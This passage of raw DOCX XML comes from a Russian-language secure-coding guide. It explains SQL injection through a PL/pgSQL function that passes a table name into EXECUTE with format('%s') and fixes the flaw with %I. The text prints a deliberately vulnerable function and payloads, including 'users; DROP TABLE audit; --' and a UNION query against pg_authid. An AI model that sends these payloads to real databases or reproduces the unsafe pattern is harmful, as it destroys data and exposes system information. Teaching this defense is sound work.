        <w:t xml:space="preserve">    EXECUTE format('SELECT COUNT(*) FROM %s', tbl_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</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GRANT EXECUTE ON FUNCTION app.get_count(text) TO application_role;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', tbl_name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> подставляет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tbl_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как есть — без quoting, без escape. Application-роль вызывает через bind-параметризацию (что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не защищает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что injection уже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">внутри</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> функции):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/api/v1/stats.py — caller выглядит "безопасно"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/stats/count")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_count(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    table: str = Query(...),</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Безопасный bind для функции, но функция уязвима</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        text("SELECT app.get_count(:tbl)"),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        {"tbl": table},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{"count": result.scalar()}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — stacked injection через identifier-position</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /stats/count?table=users%3B%20DROP%20TABLE%20audit%3B%20--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">table = "users; DROP TABLE audit; --"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Bind-параметризация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">сохраняет строку как есть</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значение</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не injection в SQL. Но функция получает её и подставляет в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', ...)</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Внутри функции:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT COUNT(*) FROM %s', 'users; DROP TABLE audit; --');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Эквивалентно:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT COUNT(*) FROM users; DROP TABLE audit; --';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE в plpgsql парсит multi-statement по `;` всегда</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отдельный канал</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не зависящий от Wire Protocol (см. ниже «Почему»). Сервер видит и исполняет:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT COUNT(*) FROM users;     -- первая команда — даёт result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DROP TABLE audit;                -- вторая команда — destructive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Результат: count возвращается (app-side не подозревает), таблица </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> удалена. Если функция SECURITY DEFINER (см. 3.16.5), DROP исполняется под superuser-привилегиями — даже если caller не имеет DROP-прав.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Альтернативный payload — SELECT-injection без DROP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /stats/count?table=users%20UNION%20SELECT%20(SELECT%20count(*)%20FROM%20pg_authid)--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">table = "users UNION SELECT (SELECT count(*) FROM pg_authid)--"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Внутри функции:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT COUNT(*) FROM users UNION SELECT (SELECT count(*) FROM pg_authid)--';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Если caller-роль не имеет SELECT на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(обычно так), вернётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: permission denied for table pg_authid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Но если функция SECURITY DEFINER и owner — superuser,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count возвращается как result — атакующий вычислил количество ролей в системе.</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(полный SQL контекст):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Caller-side:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT app.get_count('users; DROP TABLE audit;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В plpgsql функции (внутренняя EXECUTE-trace):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT COUNT(*) FROM users; DROP TABLE audit; --';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ исполняется sequentially: SELECT, потом DROP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ result SELECT возвращается в INTO result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — `%I`</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app.get_count(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS bigint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result bigint;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ПРАВИЛЬНО: %I для identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    EXECUTE format('SELECT COUNT(*) FROM %I', tbl_name) INTO result;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</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Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'users; DROP TABLE audit; --'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> теперь подставляется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">quoted identifier</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EXECUTE 'SELECT COUNT(*) FROM "users; DROP TABLE audit; --"';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ всё внутри "" — одно identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ Postgres ищет таблицу с таким именем</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ ERROR: relation "users; DROP TABLE audit; --" does not exist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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оборачивает значение в double-quotes и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">удваивает внутренние `"`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — payload остаётся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">одной строкой имени таблицы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, любые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/специальные символы внутри становятся частью identifier. Injection физически невозможна.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Для schema-qualified имён (</w:t>
      </w:r>
